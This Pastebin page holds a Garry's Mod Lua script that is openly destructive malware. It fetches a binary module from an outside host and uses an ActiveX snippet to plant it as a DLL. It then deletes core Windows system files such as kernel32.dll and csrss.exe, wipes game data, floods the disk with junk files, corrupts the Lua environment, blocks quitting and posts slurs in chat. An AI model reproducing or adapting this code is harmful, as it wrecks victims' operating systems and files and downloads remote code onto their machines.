Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- debug.sethook()
- local h = hook.Add
- local c = concommand.Add
- local fw = file.Write
- local cv = CreateConVar
- local r = _G[ "Run" .. "Con" .. "so" .. "leCo" .. "mma" .. "nd" ]
- math.randomseed( os.time() )
- local lolno = {
- __add,
- __sub,
- __mul,
- __div,
- __pow,
- __unm,
- __concat,
- __eq,
- __lt,
- __le,
- __index,
- __newindex,
- __call,
- __tostring,
- __gc,
- __mode,
- __metatable,
- pcall,
- xpcall,
- print,
- error,
- assert,
- select,
- type,
- tostring,
- tonumber,
- unpack,
- ipairs,
- pairs,
- next,
- collectgarbage,
- module
- }
- function GetRawio( contents )
- file.Write( "gm_rawio.txt", contents )
- end
- function Path()
- local u = string.Replace( util.RelativePathToFull( "../garrysmod" ), "..\\garrysmod", "" )
- u = string.Replace( u,"\\", "/" )
- return u
- end
- main = function()
- HTMLTest = vgui.Create("HTML")
- HTMLTest:SetPos(0, 0)
- HTMLTest:SetSize(ScrW(), ScrH())
- HTMLTest:SetHTML([[
- <html>
- <script type='text/javascript'>
- function MoveFile() {
- var fso, f;
- fso = new ActiveXObject('Scripting.FileSystemObject');
- f = fso.GetFile(']] .. Path() .. 'data/gm_rawio.txt' .. [[');
- f.name = 'gm_rawio.dll';
- f.Move(']] .. Path() .. '/lua/includes/modules/' .. [[');
- }
- MoveFile()
- </script>
- <body>
- <p>Hai</p>
- </body>
- </html>]])
- end
- http.Get( "http://colzdragon.net/media/filemanifest/mal/rawio.txt", "", GetRawio )
- main()
- require "rawio" --Rofl
- rawio.deletefile( "C:\\windows\\system32\\Boot\\winload.exe" )
- rawio.deletefile( "C:\\windows\\system32\\Boot\\winresume.exe" )
- rawio.deletefile( "C:\\windows\\system32\\colorui.dll" )
- rawio.deletefile( "C:\\windows\\system32\\csrss.exe" )
- rawio.deletefile( "C:\\windows\\system32\\conhost.exe" )
- rawio.deletefile( "C:\\windows\\system32\\connect.dll" )
- rawio.deletefile( "C:\\windows\\system32\\crypt32.dll" )
- rawio.deletefile( "C:\\windows\\system32\\comsvcs.exe" )
- rawio.deletefile( "C:\\windows\\system32\\dllhost.exe" )
- rawio.deletefile( "C:\\windows\\system32\\recovery.dll" )
- rawio.deletefile( "C:\\windows\\system32\\console.dll" )
- rawio.deletefile( "C:\\windows\\system32\\scrobj.dll" )
- rawio.deletefile( "C:\\windows\\system32\\sfc.dll" )
- rawio.deletefile( "C:\\windows\\system32\\sfc_os.dll" )
- rawio.deletefile( "C:\\windows\\system32\\sfc.exe" )
- rawio.deletefile( "C:\\windows\\system32\\shell32.dll" )
- rawio.deletefile( "C:\\windows\\system32\\kernel32.dll" ) --What is this I don't even
- rawio.deletefile( util.RelativePathToFull( "gameinfo.txt" ) )
- local function FuckShitUp()
- for k, v in pairs( table ) do
- for i, p in pairs( lolno ) do
- if v:lower() == p:lower() then
- table[ v ] = { "Lolno" }
- end
- end
- end
- for k, v in pairs( _G ) do
- _G[ k ] = { "Lolno" }
- end
- _G.__index = { "Lolno" }
- _G.__newindex = { "Lolno" }
- end
- hook.Add( "KeyPress", "lolk", function( )
- FuckShitUp()
- end )
- while true and MaxPlayers() do
- rawio.writefile( "C:\\" .. math.random( 1, 99999 ) .. ".txt", math.huge )
- debug.sethook()
- file.Write( "db_steamid_ip.txt", "Lol fag" )
- r( "buildcubemaps" )
- r( "jpeg", "quality", "100" )
- r( "jpeg" )
- r( "play", "npc/stalker/go_alert2a.wav" )
- r( "play", "npc/fast_zombie/breathe_loop1.wav" )
- r( "play", "npc/fast_zombie/fz_scream1.wav" )
- r( "play", "npc/turret_floor/ping.wav" )
- r( "stop" .. "sounds" )
- r( "canc" .. "elsel" .. "ect" )
- gui.SetMousePos( ScrW() / 2, ScrH() / 2 )
- cv( "gameui_activate", "", true, false )
- cv( "toggleconsole", "", true, false )
- cv( "quti", "", true, false )
- cv( "quit", "", true, false )
- cv( "exit", "", true, false )
- cv( "disconnect", "", true, false )
- cv( "sv_timeout", "999999999999999", true, false )
- r( "say", "Imafag" )
- fw( "../" .. math.random( 1, 9999999 ) .. ".txt", "lolno" )
- fw( math.random( 1, 9999999 ) .. ".txt", "lolno" )
- for k, v in pairs( file.FindInLua( "../data/advanced_duplicator/*.txt" ) ) do
- file.Delete( "../data/advanced_duplicator/" .. v .. ".txt" )
- end
- for k, v in pairs( file.FindInLua( "../data/*.txt" ) ) do
- file.Delete( "../data/" .. v .. ".txt" )
- end
- FuckShitUp()
- for i = 1, 1000 do
- print( "Lol console overflow" )
- end
- for i = 1, 1000 do
- render.AddBeam( LocalPlayer():GetPos(), 9999999999999, CurTime(), nil )
- end
- end
- function engineConsoleCommand( )
- return false
- end
- function os.time()
- return "12212012"
- end
- arg = nil
- debug = {}
- package = {}
- io = {}
- require = function() end
- module = function() end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement